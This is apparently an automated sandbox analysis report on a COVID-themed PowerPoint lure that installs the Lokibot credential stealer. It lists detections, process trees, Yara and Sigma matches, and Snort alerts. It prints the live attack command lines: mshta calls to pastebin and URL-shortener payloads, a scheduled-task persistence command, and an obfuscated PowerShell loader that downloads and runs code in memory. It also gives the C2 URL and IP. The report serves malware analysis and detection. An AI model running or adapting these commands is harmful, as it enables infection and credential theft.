Analysis Report covid-19 preventive measures.pps

Overview

General Information

Sample Name: covid-19 preventive measures.pps
MD5: cc17a31bb6d2ce8d57d3a108782b6796
SHA1: 4f996c5df95fdde1662c76238760f6f585732b28
SHA256: 63dd9c2279f0a416634a20224e9e8e015c7f8fab93e1147212ead6867cb7e68f

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Mshta Download Pastebin
Sigma detected: Powershell execute code from registry
Sigma detected: Schedule script from internet via mshta
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Lokibot
Connects to a URL shortener service
Connects to a pastebin service (likely for C&C)
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Notepad Making Network Connection
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected aPLib compressed binary
Adds / modifies Windows certificates
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Domain name seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w7
  • POWERPNT.EXE (PID: 3844 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding MD5: 0F144ECA8CFEC8882A3809D176886255)
  • cmd.exe (PID: 3948 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\covid-19 preventive measures.pps' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 3996 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s 'C:\Users\user\Desktop\covid-19 preventive measures.pps' MD5: 0F144ECA8CFEC8882A3809D176886255)
      • mshta.exe (PID: 4076 cmdline: 'C:\Windows\System32\mshta.exe' https:\\%20%20@j.mp\ddddjxdsadasdasidjaisd MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
        • mshta.exe (PID: 1544 cmdline: 'C:\Windows\System32\mshta.exe' 'https://%20%20@pastebin.com\raw\eYgN0VQJ' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
        • schtasks.exe (PID: 2248 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'xesefiliym' /tr '\'mshta\'https://%20%20@pastebin.com\raw\eYgN0VQJ' /F MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • mshta.exe (PID: 2152 cmdline: 'C:\Windows\System32\mshta.exe' 'https://%20%20@pastebin.com\raw\NPPve1Q3' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 2292 cmdline: powershell ((gp HKCU:\Software).Fucku)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • notepad.exe (PID: 2496 cmdline: {path} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
  • taskeng.exe (PID: 2480 cmdline: taskeng.exe {64255203-6FC8-4F1D-AED4-04FE69F8E86E} S-1-5-21-290172400-2828352916-2832973385-1004:computer\user:Interactive:[1] MD5: 4F2659160AFCCA990305816946F69407)
    • mshta.exe (PID: 2544 cmdline: C:\Windows\system32\mshta.EXE https://%20%20@pastebin.com\raw\eYgN0VQJ MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 2440 cmdline: powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/ZMvuU7Df'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 2692 cmdline: 'C:\Windows\system32\mshta.exe' 'https://%20%20@pastebin.com\raw\Y9J7y39n' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • mshta.exe (PID: 2912 cmdline: 'C:\Windows\system32\mshta.exe' 'https://%20%20@pastebin.com\raw\SHWX0snh' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • mshta.exe (PID: 2460 cmdline: 'C:\Windows\system32\mshta.exe' 'https://%20%20@pastebin.com\raw\NPPve1Q3' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 3488 cmdline: powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/ZMvuU7Df'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 2812 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close') MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
    • powershell.exe (PID: 3156 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • notepad.exe (PID: 4000 cmdline: {path} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
  • powershell.exe (PID: 2156 cmdline: powershell ((gp HKCU:\Software).Fucku)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • notepad.exe (PID: 2948 cmdline: {path} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"c2:": "https://visina-centar.com/glsx/btls/fre.php"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000020.00000002.1060151120.00400000.00000040.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000020.00000002.1060151120.00400000.00000040.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000020.00000002.1060151120.00400000.00000040.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x13bff:$des3: 68 03 66 00 00
  • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000020.00000002.1060151120.00400000.00000040.00000001.sdmp | Loki_1 | Loki Payload | kevoreilly
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
00000024.00000002.1175641826.00400000.00000040.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
36.2.notepad.exe.400000.0.raw.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
36.2.notepad.exe.400000.0.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
36.2.notepad.exe.400000.0.raw.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group
  • 0x13bff:$des3: 68 03 66 00 00
  • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
36.2.notepad.exe.400000.0.raw.unpack | Loki_1 | Loki Payload | kevoreilly
  • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x153fc:$a2: last_compatible_version
32.2.notepad.exe.400000.0.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Steve Miller, Florian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x13e80:$s2: https://
  • 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://

Sigma Overview

System Summary:

Sigma detected: Mshta Download Pastebin
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\mshta.exe' 'https://%20%20@pastebin.com\raw\eYgN0VQJ', CommandLine: 'C:\Windows\System32\mshta.exe' 'https://%20%20@pastebin.com\raw\eYgN0VQJ', CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' https:\\%20%20@j.mp\ddddjxdsadasdasidjaisd, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4076, ProcessCommandLine: 'C:\Windows\System32\mshta.exe' 'https://%20%20@pastebin.com\raw\eYgN0VQJ', ProcessId: 1544
Sigma detected: Powershell execute code from registry
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close'), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, ProcessId: 3156
Sigma detected: Schedule script from internet via mshta
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'xesefiliym' /tr '\'mshta\'https://%20%20@pastebin.com\raw\eYgN0VQJ' /F , CommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'xesefiliym' /tr '\'mshta\'https://%20%20@pastebin.com\raw\eYgN0VQJ' /F , CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' https:\\%20%20@j.mp\ddddjxdsadasdasidjaisd, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4076, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'xesefiliym' /tr '\'mshta\'https://%20%20@pastebin.com\raw\eYgN0VQJ' /F , ProcessId: 2248
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close'), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, ProcessId: 3156
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis; Data: Command: 'C:\Windows\System32\mshta.exe' https:\\%20%20@j.mp\ddddjxdsadasdasidjaisd, CommandLine: 'C:\Windows\System32\mshta.exe' https:\\%20%20@j.mp\ddddjxdsadasdasidjaisd, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s 'C:\Users\user\Desktop\covid-19 preventive measures.pps', ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 3996, ProcessCommandLine: 'C:\Windows\System32\mshta.exe' https:\\%20%20@j.mp\ddddjxdsadasdasidjaisd, ProcessId: 4076
Sigma detected: Notepad Making Network Connection
Source: Network Connection; Author: EagleEye Team; Data: DestinationIp: 77.105.36.109, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\notepad.exe, Initiated: true, ProcessId: 2496, Protocol: tcp, SourceIp: 192.168.2.2, SourceIsIpv6: false, SourcePort: 49170

Signature Overview

AV Detection:

Found malware configuration
Source: notepad.exe.2496.23.memstr; Malware Configuration Extractor: Lokibot {"c2:": "https://visina-centar.com/glsx/btls/fre.php"}
Multi AV Scanner detection for domain / URL
Source: http://visina-centar.com/glsx/btls/fre.php; Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: covid-19 preventive measures.pps; Virustotal: Detection: 14%
Machine Learning detection for sample
Source: covid-19 preventive measures.pps; Joe Sandbox ML: detected

Source: C:\Windows\System32\notepad.exe; Code function: 23_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,23_2_00403D74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE; Process created: C:\Windows\System32\mshta.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.2:49170 -> 77.105.36.109:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49170 -> 77.105.36.109:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49170 -> 77.105.36.109:80
Source: Traffic; Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.2:49170 -> 77.105.36.109:80
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.2:49171 -> 77.105.36.109:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49171 -> 77.105.36.109:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49171 -> 77.105.36.109:80
Source: Traffic; Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.2:49171 -> 77.105.36.109:80
Source: Traffic; Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49172 -> 77.105.36.109:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49172 -> 77.105.36.109:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49172 -> 77.105.36.109:80
Source: Traffic; Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49172 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49204 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49204 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49205 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49205 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49205 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49205 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49206 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49206 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49206 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49206 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49208 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49208 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49208 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49208 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49209 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49209 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49209 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49209 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49210 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49210 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49210 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49210 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49211 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49211 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49211 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49211 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49212 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49212 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49212 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49212 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49213 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49213 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49213 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49213 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49215 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49215 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49215 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49215 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49216 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49216 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49216 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49216 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49217 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49217 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49217 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49217 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49218 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49218 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49218 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49218 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49219 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49219 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49219 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49219 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49220 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49220 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49220 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49220 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49221 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49221 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49221 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49221 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49222 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49222 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49222 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49222 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49223 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49223 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49223 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49223 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49224 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49224 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49224 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49224 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49225 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49225 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49225 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49225 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49226 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49226 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49226 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49226 -> 77.105.36.109:80
